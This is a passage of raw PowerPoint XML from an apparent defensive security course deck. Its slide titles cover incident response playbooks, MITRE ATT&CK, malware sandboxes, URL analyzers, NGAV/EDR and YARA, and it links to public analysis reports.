            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3940DBA-733E-8240-AB23-61C775A79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2251"/>
            <a:ext cx="9144000" cy="4897942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2097577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D8F4-A07C-5E48-818F-2016870BA5C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9C95550-F86F-7A48-817E-9362AB07022A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2131692"/>
            <a:ext cx="7620000" cy="3737616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39466342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19BE-3D13-8F40-80E7-0AE038D5D812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other URLs of interest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{449C65E8-0D9E-224B-84EF-8810EA0EFA96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.hybrid-analysis.com/sample/bfee8973fbd4f354790a29fddf3e2e8af990914811ede9282a36d994e23ba94f?environmentId=100</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://urlquery.net/report/b83692de-10db-4a00-b2ce-0b8978000b71</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E0BAF65-40FD-084B-A8BE-DBDC62A05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988" y="3548399"/>
            <a:ext cx="4672012" cy="3309601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012214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EFC2-FEBC-3A41-A9F0-04B4D4949AEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NGAV/EDR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92F2B71-205E-9749-81F0-F5E637C5246C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next Generation Anti Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Endpoint Detection and Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Better mousetrap for finding infections/intruders on hosts vs traditional AV/IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3959123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F7738-0E47-D840-9285-D69CCC8F155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5EA8CE-B5E1-6841-A420-DA49F68BDA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14" y="0"/>
            <a:ext cx="8650128" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3616490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DCD0-15C9-6542-965E-5A82AF22F5D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F69E1925-1EE3-7640-B4EB-B0FE624CA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04818"/>
            <a:ext cx="9056876" cy="4284324"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2313919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220E-EDA3-B34D-B9E0-FC7D38F0B32A}"/>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431AB97C-AFB5-2F4E-A5EB-D9CFD8F74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1" y="1674688"/>
            <a:ext cx="9091687" cy="4038932"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1150849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4976</TotalTime>
  <Words>3545</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>470</Paragraphs>
  <Slides>139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139</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="145" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Gotham-Book</vt:lpstr>
      <vt:lpstr>Adjacency</vt:lpstr>
      <vt:lpstr>Security Tools for Information Security</vt:lpstr>
      <vt:lpstr>Incident Response and Investigations</vt:lpstr>
      <vt:lpstr>Playbooks</vt:lpstr>
      <vt:lpstr>Elements of a Play</vt:lpstr>
      <vt:lpstr>Play: SQL injection review</vt:lpstr>
      <vt:lpstr>Play: SQL injection review</vt:lpstr>
      <vt:lpstr>Play: SQL injection review</vt:lpstr>
      <vt:lpstr>Play: SQL injection review</vt:lpstr>
      <vt:lpstr>Play: SQL injection review</vt:lpstr>
      <vt:lpstr>Play: SQL injection review</vt:lpstr>
      <vt:lpstr>Play: SQL injection review</vt:lpstr>
      <vt:lpstr>Play: SQL injection review</vt:lpstr>
      <vt:lpstr>Play: Ransomware Response</vt:lpstr>
      <vt:lpstr>Play: Ransomware Response</vt:lpstr>
      <vt:lpstr>Play: Ransomware Response</vt:lpstr>
      <vt:lpstr>Play: Ransomware Response</vt:lpstr>
      <vt:lpstr>Play: Ransomware Response</vt:lpstr>
      <vt:lpstr>Play: Ransomware Response</vt:lpstr>
      <vt:lpstr>Play: Ransomware Response</vt:lpstr>
      <vt:lpstr>Play: Ransomware Response</vt:lpstr>
      <vt:lpstr>Play: Ransomware Response</vt:lpstr>
      <vt:lpstr>Building Playbooks</vt:lpstr>
      <vt:lpstr>Maintaining Playbooks</vt:lpstr>
      <vt:lpstr>More on Playbooks</vt:lpstr>
      <vt:lpstr>Automating Playbooks</vt:lpstr>
      <vt:lpstr>Spam/Phishing</vt:lpstr>
      <vt:lpstr>IOC indicator - Website</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Threat Hunting</vt:lpstr>
      <vt:lpstr>Threat Hunting Investigation Types</vt:lpstr>
      <vt:lpstr>Intel / Attribution </vt:lpstr>
      <vt:lpstr>https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Additional Info</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK - Tactics</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK - Techniques</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK – Sub-techniques</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK - Procedures</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK - Tactics</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK - Tactics</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK - Tactics</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK - Tactics</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Matrix</vt:lpstr>
      <vt:lpstr>Credential Access – OS Dumping</vt:lpstr>
      <vt:lpstr>Credential Access – OS Dumping</vt:lpstr>
      <vt:lpstr>Credential Access – OS Dumping</vt:lpstr>
      <vt:lpstr>Credential Access – OS Dumping</vt:lpstr>
      <vt:lpstr>ATT&amp;CK Navigator</vt:lpstr>
      <vt:lpstr>Case Study: Collector-stealer</vt:lpstr>
      <vt:lpstr>Automatic Malware Analysis </vt:lpstr>
      <vt:lpstr>VirusTotal</vt:lpstr>
      <vt:lpstr>VirusTotal</vt:lpstr>
      <vt:lpstr>VirusTotal</vt:lpstr>
      <vt:lpstr>VirusTotal</vt:lpstr>
      <vt:lpstr>VirusTotal – known binaries</vt:lpstr>
      <vt:lpstr>Hybrid Analysis</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Hybrid Analysis Sample</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>enpm685-bot-v2.exe SHA256: 689b6574eaf549cd97e7d2ac8c2eb4f2c2477acdda7dbcc5a6883f8ae09dff2c</vt:lpstr>
      <vt:lpstr>Joe Sandbox</vt:lpstr>
      <vt:lpstr>Joe Sandbox Sample Report</vt:lpstr>
      <vt:lpstr>Joe Sandbox Sample Report</vt:lpstr>
      <vt:lpstr>Joe Sandbox Sample Report</vt:lpstr>
      <vt:lpstr>Joe Sandbox Sample Report</vt:lpstr>
      <vt:lpstr>Cuckoo Sandbox</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Automatic IP/URL analyzers </vt:lpstr>
      <vt:lpstr>VirusTotal</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>urlquery.net</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>urlscan.io</vt:lpstr>
      <vt:lpstr>urlscan.io</vt:lpstr>
      <vt:lpstr>Grey Noise</vt:lpstr>
      <vt:lpstr>Grey Noise</vt:lpstr>
      <vt:lpstr>Censys.io</vt:lpstr>
      <vt:lpstr>Threat Miner </vt:lpstr>
      <vt:lpstr>SenderBase</vt:lpstr>
      <vt:lpstr>Real Life Example</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Other URLs of interest</vt:lpstr>
      <vt:lpstr>NGAV/EDR</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Enterprise-wide Search</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Normal(ish)</vt:lpstr>
      <vt:lpstr>We Have A Problem…</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Who’s behind this?</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>59 systems and a review of 2.5+ months of logs later...</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Attackers</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A Phishing Investigation </vt:lpstr>
      <vt:lpstr>A Phishing Investigation </vt:lpstr>
      <vt:lpstr>Log4J Investigation</vt:lpstr>
      <vt:lpstr>Log4J Investigation</vt:lpstr>
      <vt:lpstr>Log4J Investigation</vt:lpstr>
      <vt:lpstr>Log4J Investigation</vt:lpstr>
      <vt:lpstr>https://www.virustotal.com/graph/g99c8405df698414192c3e5c8dae3d7f3cbbe7a3c1fdf4e478207ac586cf2dde6 </vt:lpstr>
      <vt:lpstr>Automated Malware Analysis</vt:lpstr>
      <vt:lpstr>YARA</vt:lpstr>
      <vt:lpstr>YARA Format</vt:lpstr>
      <vt:lpstr>YARA Format</vt:lpstr>
      <vt:lpstr>Sample rule</vt:lpstr>
      <vt:lpstr> </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Tools for Information Security</dc:title>
  <dc:creator>Kevin Shivers</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>299</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-07-28T00:53:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-25T02:28:39Z</dcterms:modified>
</cp:coreProperties>
</file>